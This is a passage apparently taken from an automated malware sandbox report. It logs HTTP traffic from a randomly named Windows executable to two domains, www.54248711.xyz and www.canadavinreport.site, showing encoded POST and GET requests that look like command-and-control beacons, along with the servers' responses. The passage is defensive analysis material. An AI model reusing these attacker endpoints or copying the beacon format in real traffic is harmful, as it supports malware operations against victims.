                                                                                                                        Nov 21, 2024 16:23:15.442589998 CET370INData Raw: ee 1c 82 a8 28 61 4c 60 21 49 08 3e c9 90 08 3a ce 38 25 3e 8f 21 99 be 04 2b a0 46 10 06 01 f5 33 e1 dc 8e 80 cb 7c 12 87 01 06 8b 22 10 2e 9a 20 08 31 70 a5 f0 91 10 8e 77 c3 fd 10 6c 43 2e 44 44 a4 fb b2 00 b2 05 38 9f 75 e3 38 d8 fb b0 02 e0
                                                                                                                        Data Ascii: (aL`!I>:8%>!+F3|". 1pwlC.DD8u8'/]tt0{{"G8A~[F`\075"J0B,FM@y#zJaac8;)76EO=m?5L


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        39192.168.2.950013161.97.142.144806608C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Nov 21, 2024 16:23:16.833781958 CET1629OUTPOST /jm2l/ HTTP/1.1
                                                                                                                        Host: www.54248711.xyz
                                                                                                                        Accept: */*
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Origin: http://www.54248711.xyz
                                                                                                                        Cache-Control: max-age=0
                                                                                                                        Content-Length: 1228
                                                                                                                        Connection: close
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Referer: http://www.54248711.xyz/jm2l/
                                                                                                                        User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                        Data Raw: 62 42 77 3d 42 30 64 43 6f 4b 74 49 47 71 47 63 69 7a 34 72 38 39 48 63 4d 31 4b 57 30 75 79 70 73 53 66 4e 49 70 50 78 44 33 70 6f 55 31 6c 73 57 4d 51 41 35 32 38 30 46 49 6c 5a 53 6f 61 67 6a 65 64 53 70 52 49 35 31 4c 4e 52 47 44 35 35 77 54 77 71 70 35 69 2b 72 4e 35 4b 2b 65 41 5a 54 4d 52 68 69 42 67 38 50 56 64 72 2b 46 7a 44 34 51 69 42 4b 59 78 47 5a 46 73 47 6d 2f 30 30 68 32 4d 2b 4e 4c 50 4e 2b 47 73 73 58 7a 6f 33 54 34 31 75 7a 57 32 77 44 4f 6d 70 65 2b 42 73 39 48 75 76 78 6c 6f 47 35 38 6a 4b 4e 39 72 79 39 79 6f 53 48 55 64 76 55 4b 6b 77 4b 39 6f 65 43 52 50 45 56 75 6d 6a 7a 4f 75 2f 35 38 51 41 6f 6b 31 2f 53 48 2b 70 75 31 36 38 76 4a 46 48 47 70 51 35 44 2b 59 4a 2f 49 62 48 4d 5a 2b 72 43 6b 49 6f 4d 57 4d 42 65 4f 36 7a 5a 4c 62 59 77 6b 75 74 6a 4a 44 2b 59 55 69 72 6b 56 52 61 7a 7a 54 37 38 4d 62 41 65 71 52 62 59 4d 72 63 59 30 51 61 50 33 38 45 4f 4e 2b 77 71 58 77 4c 67 74 49 54 6e 4d 67 75 31 38 4b 4d 4e 48 2b 48 46 7a 41 55 73 31 75 6a 36 49 77 48 76 58 4f 33 32 76 [TRUNCATED]
                                                                                                                        Data Ascii: bBw=B0dCoKtIGqGciz4r89HcM1KW0uypsSfNIpPxD3poU1lsWMQA5280FIlZSoagjedSpRI51LNRGD55wTwqp5i+rN5K+eAZTMRhiBg8PVdr+FzD4QiBKYxGZFsGm/00h2M+NLPN+GssXzo3T41uzW2wDOmpe+Bs9HuvxloG58jKN9ry9yoSHUdvUKkwK9oeCRPEVumjzOu/58QAok1/SH+pu168vJFHGpQ5D+YJ/IbHMZ+rCkIoMWMBeO6zZLbYwkutjJD+YUirkVRazzT78MbAeqRbYMrcY0QaP38EON+wqXwLgtITnMgu18KMNH+HFzAUs1uj6IwHvXO32vA0ipP9JT2DmFOr5D7tHk8m0y4kZjwoyFgYKi9JO1S5CQqAKKNs+TpyrT2yKrGClXQs+WxiMukMBRx/yVNReCLPdIwoxsy9j60OQxWTMkwTH/9PKPbVCeHqvX8v9WgS+mdSc5S08gKxc4/XpQTrP5AWPb63cJm/7tLil+6kCmjUvjmsHUfLEfv3/GEr26p+U82O51Ju18/9c+yjeamyWyAiY+Zc58lUJ4FFEjeCACQ0C3o6IqH3ZQBq2bNNQ5Dyw15YyaG3Vi2ncUCoKMU0srgHJGli5Pnxe80mnT/Aq6/tqi/bnqt1QrpUWUfq35/SUsh0r/oC0HVWJ2r0FbL4LmdycWFgjRxeO3sViA/zyV64z+aaRzucZcTSkYAQM+qOvJxGC5rcrtk3PPqnU6wyXFGDd7NsaGdigGGG2yzBlblbK2t3H9qq+yOoPVVL4uNiaOTwkMab8bY1UqaC1F8pREAAQnUeuWWHgbPCmq7MxAksy0nOOEKR8B3VnqqhOBhijNaIeXJaCqqWWdSEdcqeQfHGW46FZpvnbD6y3MXrw2Gs9ksVS0YQgQN2nMuqUWXZ5+RbuYGvkXWM+46shwGUomrRhatDM3fCfWxD3dPSO2lnoj7YynKWyxaW2nxiGs/Hsn3tF0REReaQRRvW12R1GZpRtnd+RnAIRwhv [TRUNCATED]
                                                                                                                        Nov 21, 2024 16:23:18.152887106 CET1236INHTTP/1.1 404 Not Found
                                                                                                                        Server: nginx
                                                                                                                        Date: Thu, 21 Nov 2024 15:23:17 GMT
                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                        Transfer-Encoding: chunked
                                                                                                                        Connection: close
                                                                                                                        Vary: Accept-Encoding
                                                                                                                        ETag: W/"66cce1df-b96"
                                                                                                                        Content-Encoding: gzip
                                                                                                                        Data Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f [TRUNCATED]
                                                                                                                        Data Ascii: 54eVY6~v~"H,i^4&hrS(K]Yt$^Pvp_>(}PwdJ;[nU(Uhv6Jm5Pb*+=WUaU&Q^A-l?FEoJ=vI7~];QC&eoT.*lvgm:ZLm@Xmzs^EuN%H^!VFoX_uHzw8/k50 &nUnt]d{z1D7()St7JawG.z|Q&8UjXB]O;g}|5@Ro&i<b)~KmA5n*)55AZ,/svWrt1J;^lJ(?}in`yqB 3ZcNqE^x$W,zkS3'xPuKt$:!f$iUw?:!arVF*&P&mFWgC!;cC;xpUafKpZXzUR1k.1Z`?cVC4l- v\^x<XTM=z#zBqg[e_Ynwv2?tf.)x rkp8 ^9tGIw2+"$/V|NRkPqcq?mDEN&BFtKGQ/xI %iO|CqCJAtV"|"@(3'!A>0HpL(pHP8G,$Qc
                                                                                                                        Nov 21, 2024 16:23:18.152946949 CET370INData Raw: ee 1c 82 a8 28 61 4c 60 21 49 08 3e c9 90 08 3a ce 38 25 3e 8f 21 99 be 04 2b a0 46 10 06 01 f5 33 e1 dc 8e 80 cb 7c 12 87 01 06 8b 22 10 2e 9a 20 08 31 70 a5 f0 91 10 8e 77 c3 fd 10 6c 43 2e 44 44 a4 fb b2 00 b2 05 38 9f 75 e3 38 d8 fb b0 02 e0
                                                                                                                        Data Ascii: (aL`!I>:8%>!+F3|". 1pwlC.DD8u8'/]tt0{{"G8A~[F`\075"J0B,FM@y#zJaac8;)76EO=m?5L


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        40192.168.2.950014161.97.142.144806608C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Nov 21, 2024 16:23:19.493277073 CET338OUTGET /jm2l/?PBk=f4VDN8Bp14IhbV&bBw=M21ir/NSFfGrmB4z/u+JMR/HgMrfgTX4RaXyCSFwSSwtaZs5yH0UEptpPba+9Px3pipv0aZDZRRy+Xo/jJmyg51Tr+0rPqFG3CUyYWI31hnfzG2FIQ== HTTP/1.1
                                                                                                                        Host: www.54248711.xyz
                                                                                                                        Accept: */*
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Connection: close
                                                                                                                        User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                        Nov 21, 2024 16:23:20.782006979 CET1236INHTTP/1.1 404 Not Found
                                                                                                                        Server: nginx
                                                                                                                        Date: Thu, 21 Nov 2024 15:23:20 GMT
                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                        Content-Length: 2966
                                                                                                                        Connection: close
                                                                                                                        Vary: Accept-Encoding
                                                                                                                        ETag: "66cce1df-b96"
                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 22 48 [TRUNCATED]
                                                                                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Page Not Found</title><style>body {background-color: #f5f5f5;margin-top: 8%;color: #5d5d5d;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial,"Noto Sans", sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol","Noto Color Emoji";text-shadow: 0px 1px 1px rgba(255, 255, 255, 0.75);text-align: center;}h1 {font-size: 2.45em;font-weight: 700;color: #5d5d5d;letter-spacing: -0.02em;margin-bottom: 30px;margin-top: 30px;}.container {width: 100%;margin-right: auto;margin-left: auto;}.animate__animated {animation-duration: 1s;animation-fill-mode: both;}.animate__fadeIn {animation-name: fadeIn;}.info {color: #5594cf;fill: #5594cf;}.error [TRUNCATED]
                                                                                                                        Nov 21, 2024 16:23:20.782027006 CET1236INData Raw: 3b 0a 09 09 09 09 66 69 6c 6c 3a 20 23 63 39 32 31 32 37 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 77 61 72 6e 69 6e 67 20 7b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 66 66 63 63 33 33 3b 0a 09 09 09 09 66 69 6c 6c 3a 20 23 66 66 63 63 33 33 3b 0a 09 09
                                                                                                                        Data Ascii: ;fill: #c92127;}.warning {color: #ffcc33;fill: #ffcc33;}.success {color: #5aba47;fill: #5aba47;}.icon-large {height: 132px;width: 132px;}.description-text {color: #707
                                                                                                                        Nov 21, 2024 16:23:20.782042027 CET698INData Raw: 39 34 31 20 32 31 36 20 32 39 36 76 34 63 30 20 36 2e 36 32 37 20 35 2e 33 37 33 20 31 32 20 31 32 20 31 32 68 35 36 63 36 2e 36 32 37 20 30 20 31 32 2d 35 2e 33 37 33 20 31 32 2d 31 32 76 2d 31 2e 33 33 33 63 30 2d 32 38 2e 34 36 32 20 38 33 2e
                                                                                                                        Data Ascii: 941 216 296v4c0 6.627 5.373 12 12 12h56c6.627 0 12-5.373 12-12v-1.333c0-28.462 83.186-29.647 83.186-106.667 0-58.002-60.165-102-116.531-102zM256 338c-25.365 0-46 20.635-46 46 0 25.364 20.635 46 46 46s46-20.636 46-46c0-25.365-20.635-46-46-46z"


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        41192.168.2.950015185.27.134.206806608C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Nov 21, 2024 16:23:27.061866999 CET616OUTPOST /cvhb/ HTTP/1.1
                                                                                                                        Host: www.canadavinreport.site
                                                                                                                        Accept: */*
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Origin: http://www.canadavinreport.site
                                                                                                                        Cache-Control: max-age=0
                                                                                                                        Content-Length: 192
                                                                                                                        Connection: close
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Referer: http://www.canadavinreport.site/cvhb/
                                                                                                                        User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                        Data Raw: 62 42 77 3d 54 5a 56 36 69 6c 35 6c 45 71 33 6a 77 59 56 49 50 58 74 35 63 54 5a 42 63 46 72 32 6a 56 67 78 4a 6a 33 6a 42 36 55 39 77 52 69 50 44 77 6c 35 70 2b 48 64 34 2f 6a 36 4d 72 72 6a 2b 4a 67 49 42 57 36 34 6b 66 6f 76 59 46 63 4d 4f 4c 72 4c 4e 4c 6d 65 38 64 68 4e 5a 4c 78 52 72 77 55 71 30 5a 79 55 52 61 68 42 56 67 52 6d 37 37 6e 63 4d 45 42 4a 4c 44 32 57 4c 2f 56 6f 5a 6f 7a 53 4c 6f 61 30 39 55 30 62 35 49 68 42 4f 59 75 64 4c 44 34 4b 51 55 51 62 52 71 73 6b 76 61 76 2b 34 52 53 50 5a 46 74 6b 33 4c 35 39 49 59 66 4e 41 6f 47 46 7a 6e 58 4f 63 47 56 4d
                                                                                                                        Data Ascii: bBw=TZV6il5lEq3jwYVIPXt5cTZBcFr2jVgxJj3jB6U9wRiPDwl5p+Hd4/j6Mrrj+JgIBW64kfovYFcMOLrLNLme8dhNZLxRrwUq0ZyURahBVgRm77ncMEBJLD2WL/VoZozSLoa09U0b5IhBOYudLD4KQUQbRqskvav+4RSPZFtk3L59IYfNAoGFznXOcGVM
                                                                                                                        Nov 21, 2024 16:23:28.410809994 CET1041INHTTP/1.1 200 OK
                                                                                                                        Server: nginx
                                                                                                                        Date: Thu, 21 Nov 2024 15:23:28 GMT
                                                                                                                        Content-Type: text/html
                                                                                                                        Content-Length: 840
                                                                                                                        Connection: close
                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 61 65 73 2e 6a 73 22 20 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 66 75 6e 63 74 69 6f 6e 20 74 6f 4e 75 6d 62 65 72 73 28 64 29 7b 76 61 72 20 65 3d 5b 5d 3b 64 2e 72 65 70 6c 61 63 65 28 2f 28 2e 2e 29 2f 67 2c 66 75 6e 63 74 69 6f 6e 28 64 29 7b 65 2e 70 75 73 68 28 70 61 72 73 65 49 6e 74 28 64 2c 31 36 29 29 7d 29 3b 72 65 74 75 72 6e 20 65 7d 66 75 6e 63 74 69 6f 6e 20 74 6f 48 65 78 28 29 7b 66 6f 72 28 76 61 72 20 64 3d 5b 5d 2c 64 3d 31 3d 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 26 26 61 72 67 75 6d 65 6e 74 73 5b 30 5d 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 41 72 72 61 79 3f 61 72 67 75 6d 65 6e 74 73 5b 30 5d 3a 61 72 67 75 6d 65 6e 74 73 2c 65 3d 22 22 2c 66 3d 30 3b 66 3c 64 2e 6c 65 6e 67 74 68 3b 66 2b 2b 29 65 2b 3d 28 31 36 3e 64 5b 66 5d 3f 22 30 22 3a 22 22 29 2b 64 5b 66 5d 2e 74 6f 53 74 72 69 6e 67 28 31 36 [TRUNCATED]
                                                                                                                        Data Ascii: <html><body><script type="text/javascript" src="/aes.js" ></script><script>function toNumbers(d){var e=[];d.replace(/(..)/g,function(d){e.push(parseInt(d,16))});return e}function toHex(){for(var d=[],d=1==arguments.length&&arguments[0].constructor==Array?arguments[0]:arguments,e="",f=0;f<d.length;f++)e+=(16>d[f]?"0":"")+d[f].toString(16);return e.toLowerCase()}var a=toNumbers("f655ba9d09a112d4968c63579db590b4"),b=toNumbers("98344c2eee86c3994890592585b49f80"),c=toNumbers("5b582b8a1d1d5797dc3cf1b91ab6dae1");document.cookie="__test="+toHex(slowAES.decrypt(c,2,a,b))+"; expires=Thu, 31-Dec-37 23:55:55 GMT; path=/"; location.href="http://www.canadavinreport.site/cvhb/?i=1";</script><noscript>This site requires Javascript to work, please enable Javascript in your browser or use a browser with Javascript support</noscript></body></html>


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        42192.168.2.950016185.27.134.206806608C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Nov 21, 2024 16:23:29.737035036 CET640OUTPOST /cvhb/ HTTP/1.1
                                                                                                                        Host: www.canadavinreport.site
                                                                                                                        Accept: */*
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Origin: http://www.canadavinreport.site
                                                                                                                        Cache-Control: max-age=0
                                                                                                                        Content-Length: 216
                                                                                                                        Connection: close
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Referer: http://www.canadavinreport.site/cvhb/
                                                                                                                        User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                        Data Raw: 62 42 77 3d 54 5a 56 36 69 6c 35 6c 45 71 33 6a 69 72 64 49 4e 78 6c 35 51 6a 5a 43 54 6c 72 32 36 6c 67 71 4a 6a 4c 6a 42 35 59 74 73 7a 32 50 41 53 74 35 6f 37 37 64 78 76 6a 36 48 4c 72 6d 78 70 67 39 42 57 6d 47 6b 61 49 76 59 45 34 4d 4f 4a 7a 4c 4e 38 79 64 38 4e 68 50 56 72 78 50 6b 51 55 71 30 5a 79 55 52 61 46 72 56 67 4a 6d 37 4c 33 63 4d 6c 42 47 55 7a 32 4a 4d 2f 56 6f 53 49 7a 57 4c 6f 61 47 39 56 34 69 35 4b 5a 42 4f 59 2b 64 4c 57 55 4c 48 45 51 42 66 4b 74 4b 6d 61 6d 33 37 68 4b 37 63 56 42 36 70 4b 31 75 43 5a 6a 54 52 61 50 65 6d 77 58 70 62 68 63 6b 61 5a 5a 79 66 46 78 45 71 54 4d 6e 46 6b 6c 4a 6b 73 4e 4b 59 77 3d 3d
                                                                                                                        Data Ascii: bBw=TZV6il5lEq3jirdINxl5QjZCTlr26lgqJjLjB5Ytsz2PASt5o77dxvj6HLrmxpg9BWmGkaIvYE4MOJzLN8yd8NhPVrxPkQUq0ZyURaFrVgJm7L3cMlBGUz2JM/VoSIzWLoaG9V4i5KZBOY+dLWULHEQBfKtKmam37hK7cVB6pK1uCZjTRaPemwXpbhckaZZyfFxEqTMnFklJksNKYw==
                                                                                                                        Nov 21, 2024 16:23:31.088588953 CET1041INHTTP/1.1 200 OK
                                                                                                                        Server: nginx
                                                                                                                        Date: Thu, 21 Nov 2024 15:23:30 GMT
                                                                                                                        Content-Type: text/html
                                                                                                                        Content-Length: 840
                                                                                                                        Connection: close
                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 61 65 73 2e 6a 73 22 20 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 66 75 6e 63 74 69 6f 6e 20 74 6f 4e 75 6d 62 65 72 73 28 64 29 7b 76 61 72 20 65 3d 5b 5d 3b 64 2e 72 65 70 6c 61 63 65 28 2f 28 2e 2e 29 2f 67 2c 66 75 6e 63 74 69 6f 6e 28 64 29 7b 65 2e 70 75 73 68 28 70 61 72 73 65 49 6e 74 28 64 2c 31 36 29 29 7d 29 3b 72 65 74 75 72 6e 20 65 7d 66 75 6e 63 74 69 6f 6e 20 74 6f 48 65 78 28 29 7b 66 6f 72 28 76 61 72 20 64 3d 5b 5d 2c 64 3d 31 3d 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 26 26 61 72 67 75 6d 65 6e 74 73 5b 30 5d 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 41 72 72 61 79 3f 61 72 67 75 6d 65 6e 74 73 5b 30 5d 3a 61 72 67 75 6d 65 6e 74 73 2c 65 3d 22 22 2c 66 3d 30 3b 66 3c 64 2e 6c 65 6e 67 74 68 3b 66 2b 2b 29 65 2b 3d 28 31 36 3e 64 5b 66 5d 3f 22 30 22 3a 22 22 29 2b 64 5b 66 5d 2e 74 6f 53 74 72 69 6e 67 28 31 36 [TRUNCATED]
                                                                                                                        Data Ascii: <html><body><script type="text/javascript" src="/aes.js" ></script><script>function toNumbers(d){var e=[];d.replace(/(..)/g,function(d){e.push(parseInt(d,16))});return e}function toHex(){for(var d=[],d=1==arguments.length&&arguments[0].constructor==Array?arguments[0]:arguments,e="",f=0;f<d.length;f++)e+=(16>d[f]?"0":"")+d[f].toString(16);return e.toLowerCase()}var a=toNumbers("f655ba9d09a112d4968c63579db590b4"),b=toNumbers("98344c2eee86c3994890592585b49f80"),c=toNumbers("5b582b8a1d1d5797dc3cf1b91ab6dae1");document.cookie="__test="+toHex(slowAES.decrypt(c,2,a,b))+"; expires=Thu, 31-Dec-37 23:55:55 GMT; path=/"; location.href="http://www.canadavinreport.site/cvhb/?i=1";</script><noscript>This site requires Javascript to work, please enable Javascript in your browser or use a browser with Javascript support</noscript></body></html>


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        43192.168.2.950017185.27.134.206806608C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Nov 21, 2024 16:23:32.408984900 CET1653OUTPOST /cvhb/ HTTP/1.1
                                                                                                                        Host: www.canadavinreport.site
                                                                                                                        Accept: */*
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Origin: http://www.canadavinreport.site
                                                                                                                        Cache-Control: max-age=0
                                                                                                                        Content-Length: 1228
                                                                                                                        Connection: close
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Referer: http://www.canadavinreport.site/cvhb/
                                                                                                                        User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                        Data Raw: 62 42 77 3d 54 5a 56 36 69 6c 35 6c 45 71 33 6a 69 72 64 49 4e 78 6c 35 51 6a 5a 43 54 6c 72 32 36 6c 67 71 4a 6a 4c 6a 42 35 59 74 73 7a 4f 50 44 6e 68 35 70 59 54 64 72 76 6a 36 5a 37 72 6e 78 70 67 67 42 57 2b 43 6b 61 4d 2f 59 47 77 4d 4f 71 37 4c 4c 4f 4b 64 33 4e 68 50 49 62 78 4f 72 77 55 2f 30 5a 69 51 52 61 31 72 56 67 4a 6d 37 4f 37 63 46 55 42 47 50 7a 32 57 4c 2f 56 61 5a 6f 7a 2b 4c 6f 7a 78 39 56 38 74 35 37 35 42 41 63 69 64 4a 6b 73 4c 45 6b 51 48 59 4b 74 6b 6d 61 36 30 37 68 6d 52 63 56 31 45 70 4c 42 75 41 63 66 4b 4f 75 2f 6b 6c 43 44 45 55 47 45 46 64 35 4e 61 64 47 67 66 37 51 6f 78 46 32 30 4b 6f 74 31 48 45 4a 44 5a 68 37 50 51 76 30 73 62 47 30 2f 56 35 6e 37 32 4c 53 61 69 50 32 64 32 43 6b 4f 46 73 6e 42 4f 62 63 32 4d 51 6e 70 34 62 41 4a 52 5a 70 50 79 66 34 52 32 50 79 74 66 74 6b 36 62 76 65 31 43 52 67 51 72 34 34 55 64 56 51 58 5a 4f 69 64 59 44 45 63 47 57 77 30 45 4e 65 4d 37 67 49 4b 35 63 50 6a 35 39 42 2b 75 5a 56 4e 38 36 59 2f 72 47 36 34 4a 46 6e 7a 6e 66 58 [TRUNCATED]
                                                                                                                        Data Ascii: bBw=TZV6il5lEq3jirdINxl5QjZCTlr26lgqJjLjB5YtszOPDnh5pYTdrvj6Z7rnxpggBW+CkaM/YGwMOq7LLOKd3NhPIbxOrwU/0ZiQRa1rVgJm7O7cFUBGPz2WL/VaZoz+Lozx9V8t575BAcidJksLEkQHYKtkma607hmRcV1EpLBuAcfKOu/klCDEUGEFd5NadGgf7QoxF20Kot1HEJDZh7PQv0sbG0/V5n72LSaiP2d2CkOFsnBObc2MQnp4bAJRZpPyf4R2Pytftk6bve1CRgQr44UdVQXZOidYDEcGWw0ENeM7gIK5cPj59B+uZVN86Y/rG64JFnznfXWIBZG6NCkAElY0AJSUFmEVEJtjwVW3cQcGJE2foKnoDRM4b2hI/uT0zzGMg1XjBy+0kVzzITiTw9FgV9aMA4qBLXYIxNURHFclojhTuyl7IRw0sUN6jvUG9sBt22jIIm3RjK8frdZjG/go1myFBTkrR+AzSylxr59VnylDo6nu0PraaEf1p9gRIYMCqcVfvdprvvdfKDNrJiUC3vCZl2HreEnuJJ+JXS9uoBqjbEtmmINMGeo8J+wUqPvclgR26uxGHcnHy7vGr8/ybJiX0cawXLaWqmw86MBy8878EfqWPdWgjTs9b8r+vpCeAeeec67eZ4SMxroQp0oTYxGLsJrSxVWSSbrP2bGCkWZZI+B4bYHF7w4F/mfkUTBEYth7DXaGSEoZukjeJ/82x+lMUbx/4qkzkXVejXSsHjqQK73FwKz5htjOa8oamZylS4MFda41/JNRvZzwB8+YsJeBzm6PfU1cP0x94P3ehZPFViVnsMfWlMMCQEwQu13U6HNDstUsawYSrzlVdIe8OP5vAIZE60hD1ub2tkH4VH3GVcrk6eXPUtTgWa5eiVKrwpHebtf5VHl+vuc9qH4css6+LsqpMXF1vdUh+K2gp51jz3Y7J7r/b17Ld8FHkw8jKJAfCSjLktQHqGAwOvqUuou7+lKtK7c/hPt6ggG3 [TRUNCATED]
                                                                                                                        Nov 21, 2024 16:23:33.694612026 CET1041INHTTP/1.1 200 OK
                                                                                                                        Server: nginx
                                                                                                                        Date: Thu, 21 Nov 2024 15:23:33 GMT
                                                                                                                        Content-Type: text/html
                                                                                                                        Content-Length: 840
                                                                                                                        Connection: close
                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                        Cache-Control: no-cache
